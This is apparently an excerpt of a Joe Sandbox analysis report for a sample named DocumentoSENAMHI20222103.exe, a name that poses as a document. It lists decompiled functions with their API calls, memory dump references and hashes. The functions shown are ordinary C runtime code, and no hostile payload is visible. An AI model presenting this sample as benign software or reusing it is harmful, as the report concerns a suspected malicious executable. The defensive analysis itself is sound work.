Function 00157C13 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E00157C13(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x161278(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x00157c19
0x00157c1d
0x00157c28
0x00157c30
0x00157c3b
0x00157c41
0x00157c45
0x00157c4c
0x00157c52
0x00157c52
0x00157c54
0x00157c59
0x00000000
0x00157c5e
0x00157c65

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00157BC5,?,?,00157B8D,?,00000000,?), ref: 00157C28
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00157C3B
FreeLibrary.KERNEL32(00000000,?,?,00157BC5,?,?,00157B8D,?,00000000,?), ref: 00157C5E

Strings

CorExitProcess, xrefs: 00157C33
Nv, xrefs: 00157C3B
mscoree.dll, xrefs: 00157C21

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll$Nv
API String ID: 4061214504-3362585832
Opcode ID: c58244ef2a3470b2a47c376b59eba26a1f857d5df3043f34c989a4ef173cef29
Instruction ID: 81b1cdd7949e9e50e665f70bd6e256752ed59d41ec76bf3f36503e10a0ae8bec
Opcode Fuzzy Hash: c58244ef2a3470b2a47c376b59eba26a1f857d5df3043f34c989a4ef173cef29
Instruction Fuzzy Hash: 07F03031601619FBDB119B65EE0ABDE7B79EB00756F1401A4FA01E65A0CBB18F84EB90

Uniqueness

Uniqueness Score: -1.00%

Function 0015D4C5 Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E0015D4C5(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				signed char _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				signed int _t242;
				intOrPtr _t245;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				void* _t259;
				intOrPtr _t260;
				signed int _t261;
				signed char _t264;
				intOrPtr _t267;
				signed char* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				signed int _t278;
				intOrPtr _t279;
				signed int _t280;
				struct _OVERLAPPED* _t282;
				struct _OVERLAPPED* _t284;
				signed int _t285;
				void* _t286;
				void* _t287;

				_t170 =  *0x169008; // 0x26a91022
				_v8 = _t170 ^ _t285;
				_t172 = _a8;
				_t264 = _t172 >> 6;
				_t242 = (_t172 & 0x0000003f) * 0x38;
				_t269 = _a12;
				_v108 = _t269;
				_v80 = _t264;
				_v112 =  *((intOrPtr*)(_t242 +  *((intOrPtr*)(0x292960 + _t264 * 4)) + 0x18));
				_v44 = _t242;
				_v96 = _a16 + _t269;
				_t178 = GetConsoleOutputCP();
				_t241 = 0;
				_v124 = _t178;
				E001570E3( &_v72, _t264, 0);
				_t273 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t245 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t245;
				_v104 = _t269;
				if(_t269 >= _v96) {
					L48:
					__eflags = _v60 - _t241;
				} else {
					while(1) {
						_t248 = _v44;
						_v51 =  *_t269;
						_v76 = _t241;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0x292960 + _v80 * 4));
						_v48 = _t186;
						if(_t245 != 0xfde9) {
							goto L19;
						}
						_t211 = _t241;
						_t267 = _v48 + 0x2e + _t248;
						_v116 = _t267;
						while( *((intOrPtr*)(_t267 + _t211)) != _t241) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t264 = _v96 - _t269;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t269 & 0x000000ff) + 0x169760; // 0x0
							_t253 =  *_t72 + 1;
							_v48 = _t253;
							__eflags = _t253 - _t264;
							if(_t253 > _t264) {
								__eflags = _t264;
								if(_t264 <= 0) {
									goto L40;
								} else {
									_t278 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0x292960 + _v80 * 4)) + _t278 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t269));
										_t241 =  &(_t241->Internal);
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									goto L39;
								}
							} else {
								_v144 = _t241;
								__eflags = _t253 - 4;
								_v140 = _t241;
								_v56 = _t269;
								_v40 = (_t253 == 4) + 1;
								_t220 = E0015C7FA( &_v144,  &_v76,  &_v56, (_t253 == 4) + 1,  &_v144);
								_t287 = _t286 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L48;
								} else {
									_t279 = _v48;
									goto L18;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t248 + _v48 + 0x2e) & 0x000000ff) + 0x169760)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t264) {
								__eflags = _t264;
								if(_t264 > 0) {
									_t280 = _t248;
									do {
										_t227 =  *((intOrPtr*)(_t241 + _t269));
										_t259 =  *((intOrPtr*)(0x292960 + _v80 * 4)) + _t280 + _t241;
										_t241 =  &(_t241->Internal);
										 *((char*)(_t259 + _v40 + 0x2e)) = _t227;
										_t280 = _v44;
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									L39:
									_t273 = _v88;
								}
								L40:
								_t277 = _t273 + _t264;
								__eflags = _t277;
								L41:
								__eflags = _v60;
								_v88 = _t277;
							} else {
								_t264 = _v40;
								_t282 = _t241;
								_t260 = _v116;
								do {
									 *((char*)(_t285 + _t282 - 0xc)) =  *((intOrPtr*)(_t260 + _t282));
									_t282 =  &(_t282->Internal);
								} while (_t282 < _t264);
								_t283 = _v48;
								_t261 = _v44;
								if(_v48 > 0) {
									E001556D0( &_v16 + _t264, _t269, _t283);
									_t261 = _v44;
									_t286 = _t286 + 0xc;
									_t264 = _v40;
								}
								_t272 = _v80;
								_t284 = _t241;
								do {
									 *( *((intOrPtr*)(0x292960 + _t272 * 4)) + _t261 + _t284 + 0x2e) = _t241;
									_t284 =  &(_t284->Internal);
								} while (_t284 < _t264);
								_t269 = _v104;
								_t279 = _v48;
								_v120 =  &_v16;
								_v136 = _t241;
								_v132 = _t241;
								_v40 = (_v56 == 4) + 1;
								_t237 = E0015C7FA( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t287 = _t286 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L48;
								} else {
									L18:
									_t269 = _t269 - 1 + _t279;
									L27:
									_t269 =  &(_t269[1]);
									_v104 = _t269;
									_t193 = E0015B146(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
									_t286 = _t287 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L48;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
											L47:
											_v92 = GetLastError();
											goto L48;
										} else {
											_t273 = _v84 - _v108 + _t269;
											_v88 = _t273;
											if(_v100 < _v56) {
												goto L48;
											} else {
												if(_v51 != 0xa) {
													L34:
													if(_t269 >= _v96) {
														goto L48;
													} else {
														_t245 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
														goto L47;
													} else {
														if(_v100 < 1) {
															goto L48;
														} else {
															_v84 = _v84 + 1;
															_t273 = _t273 + 1;
															_v88 = _t273;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L49;
						L19:
						_t264 =  *((intOrPtr*)(_t248 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t269;
							_t188 = E0015BE2D(_t264);
							_t249 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t249 * 2)) - _t241;
							if( *((intOrPtr*)(_t188 + _t249 * 2)) >= _t241) {
								_push(1);
								_push(_t269);
								goto L26;
							} else {
								_t100 =  &(_t269[1]); // 0x1
								_t202 = _t100;
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t264 = _v80;
									_t251 = _v44;
									_t241 = _v33;
									 *((char*)(_t251 +  *((intOrPtr*)(0x292960 + _t264 * 4)) + 0x2e)) = _v33;
									 *(_t251 +  *((intOrPtr*)(0x292960 + _t264 * 4)) + 0x2d) =  *(_t251 +  *((intOrPtr*)(0x292960 + _t264 * 4)) + 0x2d) | 0x00000004;
									_t277 = _t273 + 1;
									goto L41;
								} else {
									_t206 = E00158D4C( &_v76, _t269, 2);
									_t287 = _t286 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L48;
									} else {
										_t269 = _v56;
										goto L27;
									}
								}
							}
						} else {
							_t264 = _t264 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t248 + _t186 + 0x2e));
							_v23 =  *_t269;
							_push(2);
							 *(_t248 + _v48 + 0x2d) = _t264;
							_push( &_v24);
							L26:
							_push( &_v76);
							_t190 = E00158D4C();
							_t287 = _t286 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L48;
							} else {
								goto L27;
							}
						}
						goto L49;
					}
				}
				L49:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t285;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E0015403C(_a4, _t241, _v8 ^ _t285, _t264, _a4,  &_v92);
			}

0x0015d4d0
0x0015d4d7
0x0015d4da
0x0015d4e2
0x0015d4e5
0x0015d4f2
0x0015d4f5
0x0015d4f8
0x0015d4ff
0x0015d507
0x0015d50a
0x0015d50d
0x0015d513
0x0015d515
0x0015d51c
0x0015d526
0x0015d528
0x0015d52b
0x0015d52e
0x0015d531
0x0015d534
0x0015d537
0x0015d53d
0x0015d848
0x0015d848
0x00000000
0x0015d543
0x0015d54b
0x0015d54e
0x0015d554
0x0015d557
0x0015d55e
0x0015d565
0x0015d568
0x00000000
0x00000000
0x0015d571
0x0015d576
0x0015d578
0x0015d57b
0x0015d580
0x0015d584
0x00000000
0x00000000
0x00000000
0x0015d584
0x0015d589
0x0015d58b
0x0015d590
0x0015d64a
0x0015d651
0x0015d652
0x0015d655
0x0015d657
0x0015d7fb
0x0015d7fd
0x00000000
0x0015d7ff
0x0015d7ff
0x0015d802
0x0015d811
0x0015d815
0x0015d816
0x0015d816
0x00000000
0x0015d81a
0x0015d65d
0x0015d65f
0x0015d665
0x0015d668
0x0015d674
0x0015d67d
0x0015d688
0x0015d68d
0x0015d690
0x0015d693
0x00000000
0x0015d699
0x0015d699
0x00000000
0x0015d699
0x0015d693
0x0015d596
0x0015d5a5
0x0015d5a6
0x0015d5a9
0x0015d5ac
0x0015d5b1
0x0015d7c7
0x0015d7c9
0x0015d7cb
0x0015d7cd
0x0015d7d7
0x0015d7df
0x0015d7e1
0x0015d7e2
0x0015d7e6
0x0015d7e9
0x0015d7e9
0x0015d7ed
0x0015d7ed
0x0015d7ed
0x0015d7f0
0x0015d7f0
0x0015d7f0
0x0015d7f2
0x0015d7f2
0x0015d7f6
0x0015d5b7
0x0015d5b7
0x0015d5ba
0x0015d5bc
0x0015d5bf
0x0015d5c2
0x0015d5c6
0x0015d5c7
0x0015d5cb
0x0015d5ce
0x0015d5d3
0x0015d5dd
0x0015d5e2
0x0015d5e5
0x0015d5e8
0x0015d5e8
0x0015d5eb
0x0015d5ee
0x0015d5f0
0x0015d5f9
0x0015d5fd
0x0015d5fe
0x0015d602
0x0015d608
0x0015d611
0x0015d61e
0x0015d625
0x0015d629
0x0015d634
0x0015d639
0x0015d63f
0x00000000
0x0015d645
0x0015d69c
0x0015d69d
0x0015d720
0x0015d727
0x0015d72f
0x0015d737
0x0015d73c
0x0015d73f
0x0015d744
0x00000000
0x0015d74a
0x0015d75f
0x0015d83f
0x0015d845
0x00000000
0x0015d765
0x0015d76e
0x0015d770
0x0015d776
0x00000000
0x0015d77c
0x0015d780
0x0015d7b6
0x0015d7b9
0x00000000
0x0015d7bf
0x0015d7bf
0x00000000
0x0015d7bf
0x0015d782
0x0015d784
0x0015d786
0x0015d79f
0x00000000
0x0015d7a5
0x0015d7a9
0x00000000
0x0015d7af
0x0015d7af
0x0015d7b2
0x0015d7b3
0x00000000
0x0015d7b3
0x0015d7a9
0x0015d79f
0x0015d780
0x0015d776
0x0015d75f
0x0015d744
0x0015d63f
0x0015d5b1
0x00000000
0x0015d6a1
0x0015d6a1
0x0015d6a5
0x0015d6a8
0x0015d6ca
0x0015d6cd
0x0015d6d2
0x0015d6d6
0x0015d6da
0x0015d708
0x0015d70a
0x00000000
0x0015d6dc
0x0015d6dc
0x0015d6dc
0x0015d6df
0x0015d6e2
0x0015d6e5
0x0015d81c
0x0015d81f
0x0015d822
0x0015d82c
0x0015d837
0x0015d83c
0x00000000
0x0015d6eb
0x0015d6f2
0x0015d6f7
0x0015d6fa
0x0015d6fd
0x00000000
0x0015d703
0x0015d703
0x00000000
0x0015d703
0x0015d6fd
0x0015d6e5
0x0015d6aa
0x0015d6ae
0x0015d6b1
0x0015d6b6
0x0015d6bc
0x0015d6be
0x0015d6c5
0x0015d70b
0x0015d70e
0x0015d70f
0x0015d714
0x0015d717
0x0015d71a
0x00000000
0x00000000
0x00000000
0x00000000
0x0015d71a
0x00000000
0x0015d6a8
0x0015d543
0x0015d84b
0x0015d84b
0x0015d84d
0x0015d850
0x0015d850
0x0015d850
0x0015d850
0x0015d862
0x0015d864
0x0015d865
0x0015d866
0x0015d870

APIs

GetConsoleOutputCP.KERNEL32(00000000,?,?), ref: 0015D50D
__fassign.LIBCMT ref: 0015D6F2
__fassign.LIBCMT ref: 0015D70F
WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0015D757
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0015D797
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0015D83F

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 8c785b55b75b65f30b9ffe9a94c463a6355bc8cfd121740bad7607928bd3a96f
Instruction ID: dad2bf53ee91e613709a5ba7273f858660e86692b324ecc88bf149c50d6e3844
Opcode Fuzzy Hash: 8c785b55b75b65f30b9ffe9a94c463a6355bc8cfd121740bad7607928bd3a96f
Instruction Fuzzy Hash: 7DC19C75D00298DFCB25CFA8D8809EDBBB5EF58315F28416AE825FB241D731994ACB60

Uniqueness

Uniqueness Score: -1.00%

Function 00155DDA Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00155DDA(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x169020 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E00156F9D(_t13, __eflags,  *0x169020);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00156FD8(_t14, __eflags,  *0x169020, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E00158AC4();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00156FD8(_t18, __eflags,  *0x169020, 0);
								} else {
									_t8 = E00156FD8(_t18, __eflags,  *0x169020, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00157188(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x00155dda
0x00155de1
0x00155df4
0x00155dfb
0x00155dfd
0x00155dfe
0x00155e01
0x00155e1a
0x00155e1a
0x00155e03
0x00155e03
0x00155e05
0x00155e0f
0x00155e16
0x00155e18
0x00155e1f
0x00155e28
0x00155e2b
0x00155e2c
0x00155e2e
0x00155e42
0x00155e42
0x00155e4b
0x00155e30
0x00155e37
0x00155e3d
0x00155e3e
0x00155e40
0x00155e54
0x00155e56
0x00155e56
0x00000000
0x00000000
0x00000000
0x00155e40
0x00155e59
0x00000000
0x00000000
0x00000000
0x00155e18
0x00155e05
0x00155e61
0x00155e6b
0x00155de3
0x00155de5
0x00155de5

APIs

GetLastError.KERNEL32(?,?,00155DD1,00155516,00154B3F), ref: 00155DE8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00155DF6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00155E0F
SetLastError.KERNEL32(00000000,00155DD1,00155516,00154B3F), ref: 00155E61

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e3939f5a508092413adc2ca91df2dc5e44f57b8b44d5d41b1f3a525fa0669e26
Instruction ID: 37ddd41342847adf41702783f6c935d1f633519e7f053ca176c0ceaf55c0beff
Opcode Fuzzy Hash: e3939f5a508092413adc2ca91df2dc5e44f57b8b44d5d41b1f3a525fa0669e26
Instruction Fuzzy Hash: B101283360CB25EE9B1417B47CA666B666EDB25777770022AFD304E4E0EFA11C489140

Uniqueness

Uniqueness Score: -1.00%

Function 0015A6B8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0015A6B8(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E0015B146(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E0015B146(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E0015759E(GetLastError());
									_t17 =  *((intOrPtr*)(E001575D4(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E0015A77F(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E0015759E(GetLastError());
						_t17 =  *((intOrPtr*)(E001575D4(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E0015A77F(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E0015A7A6(_a8);
				return 0;
			}

0x0015a6be
0x0015a6c3
0x0015a6d7
0x0015a6da
0x0015a70c
0x0015a714
0x0015a716
0x0015a72f
0x0015a732
0x0015a735
0x0015a743
0x0015a752
0x0015a75a
0x0015a75c
0x0015a775
0x0015a778
0x0015a778
0x0015a75e
0x0015a765
0x0015a770
0x0015a770
0x0015a77a
0x0015a77b
0x00000000
0x0015a77b
0x0015a73a
0x0015a73f
0x0015a741
0x00000000
0x00000000
0x00000000
0x0015a741
0x0015a71f
0x0015a72a
0x00000000
0x0015a72a
0x0015a6dc
0x0015a6df
0x0015a6e2
0x0015a6f5
0x0015a6f8
0x0015a6fa
0x0015a6fc
0x00000000
0x0015a6fc
0x0015a6e8
0x0015a6ed
0x0015a6ef
0x00000000
0x00000000
0x00000000
0x0015a6ef
0x0015a6c8
0x00000000

Strings

C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe, xrefs: 0015A6BD

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe
API String ID: 0-3192360390
Opcode ID: 0c62c5a7ea5792cc780317d7a4952132301643130da49aab52f650be34a36845
Instruction ID: 293959b01e405a2f47237c2081588eb0e5ffb836cd7d5cc0467558cef2e2d37a
Opcode Fuzzy Hash: 0c62c5a7ea5792cc780317d7a4952132301643130da49aab52f650be34a36845
Instruction Fuzzy Hash: D521AC71248205EF9B20AF709CC196A7BBCAF283667504714FD358E191EB22EC4887A2

Uniqueness

Uniqueness Score: -1.00%

Function 00156E42 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00156E42(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x2927c4 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x161dbc + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E00158B48(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x00156e49
0x00156ebe
0x00156e4e
0x00156e50
0x00156e57
0x00156e5c
0x00156e65
0x00156e74
0x00156e7d
0x00156e81
0x00156eca
0x00156ecc
0x00156ed0
0x00156ed3
0x00156ed3
0x00156ed9
0x00156ed9
0x00156ec5
0x00156ec9
0x00156ec9
0x00156e83
0x00156e8c
0x00156eb6
0x00156eb9
0x00156ebb
0x00156ebb
0x00000000
0x00156ebb
0x00156e8e
0x00156e99
0x00156e9e
0x00156ea3
0x00000000
0x00000000
0x00156eaa
0x00156eb0
0x00156eb4
0x00000000
0x00000000
0x00000000
0x00156eb4
0x00156e61
0x00000000
0x00000000
0x00000000
0x00156e63
0x00156ec3
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00156F05,?,?,0029276C,00000000,?,00157030,00000004,InitializeCriticalSectionEx,00161EB0,InitializeCriticalSectionEx,00000000), ref: 00156ED3

Strings

api-ms-, xrefs: 00156E93

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: cd0ea8e3436eb84ab1b84b1630c319059c80e6317cb55e5e965062515d971476
Instruction ID: f7f64846eb299a385587b30f329db7ca4c64af0a8dc2cccec103fd3d5cf69fa3
Opcode Fuzzy Hash: cd0ea8e3436eb84ab1b84b1630c319059c80e6317cb55e5e965062515d971476
Instruction Fuzzy Hash: EE11CA35A02625F7DB22CB68DC4679A73A4EF01772F650111ED21EF290D770ED4886D1

Uniqueness

Uniqueness Score: -1.00%

Function 0015D164 Relevance: 7.7, APIs: 5, Instructions: 199
COMMON

